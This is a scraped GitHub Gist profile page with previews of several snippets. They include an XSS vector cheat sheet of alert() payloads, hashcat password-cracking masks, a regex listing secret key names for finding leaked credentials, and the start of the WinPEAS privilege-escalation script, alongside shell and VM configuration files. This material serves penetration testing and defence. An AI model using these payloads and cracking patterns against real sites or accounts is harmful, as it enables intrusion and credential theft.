Skip to content

Instantly share code, notes, and snippets.

Avatar
😀
wiew

Anthony Cozamanis kurobeats

😀
wiew
  • Unaffiliated
  • Perth, Western Australia
View GitHub Profile
@kurobeats
kurobeats / xss_vectors.txt
Last active Aug 11, 2022
XSS Vectors Cheat Sheet
View xss_vectors.txt
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
View ants-clearing-house.hcmask
?l?l?l?l?l?l?l?l
?u?u?u?u?u?u?u?u
?u?l?l?l?l?l?l?l
?u?l?l?l?l?l?l?s
?u?l?l?l?l?l?d?s
?u?l?l?l?l?d?d?s
?u?l?l?l?d?d?d?s
?u?l?l?d?d?d?d?s
?u?l?d?d?d?d?d?s
?u?d?d?d?d?d?d?s
View Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
@kurobeats
kurobeats / winpeas.bat
Last active Jan 24, 2022
winpeas-blah
View winpeas.bat
@ECHO OFF & SETLOCAL EnableDelayedExpansion
TITLE WinPEAS
COLOR 0F
CALL :SetOnce
REM :: WinPEAS - Windows local Privilege Escalation Awesome Script
REM :: Code by carlospolop; Re-Write by ThisLimn0
REM Registry scan of other drives besides
REM /////true or false
@kurobeats
kurobeats / .zshrc
Last active Sep 27, 2021
A twist on the kali zshrc
View .zshrc
# ~/.zshrc file for zsh non-login shells.
setopt autocd # change directory just by typing its name
setopt correct # auto correct mistakes
setopt interactivecomments # allow comments in interactive mode
setopt ksharrays # arrays start at 0
setopt magicequalsubst # enable filename expansion for arguments of the form ‘anything=expression’
setopt nonomatch # hide error message if there is no match for the pattern
setopt notify # report the status of background jobs immediately
setopt numericglobsort # sort filenames numerically when it makes sense
@kurobeats
kurobeats / instruct.md
Last active Jan 31, 2021
Using Fedora 33 with Microsoft’s WSL2
View instruct.md
View macOS.xml
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
virsh edit macOS
or other application using the libvirt API.
-->
<domain type='kvm' xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0'>
<name>macOS</name>
<uuid>6e79e797-26e8-4cc2-8a37-53695cc5b3b8</uuid>
View mac_zshrc
# System-wide profile for interactive zsh(1) shells.
# Setup user specific overrides for this in ~/.zshrc. See zshbuiltins(1)
# and zshoptions(1) for more details.
# Correctly display UTF-8 with combining characters.
if [[ "$(locale LC_CTYPE)" == "UTF-8" ]]; then
setopt COMBINING_CHARS
fi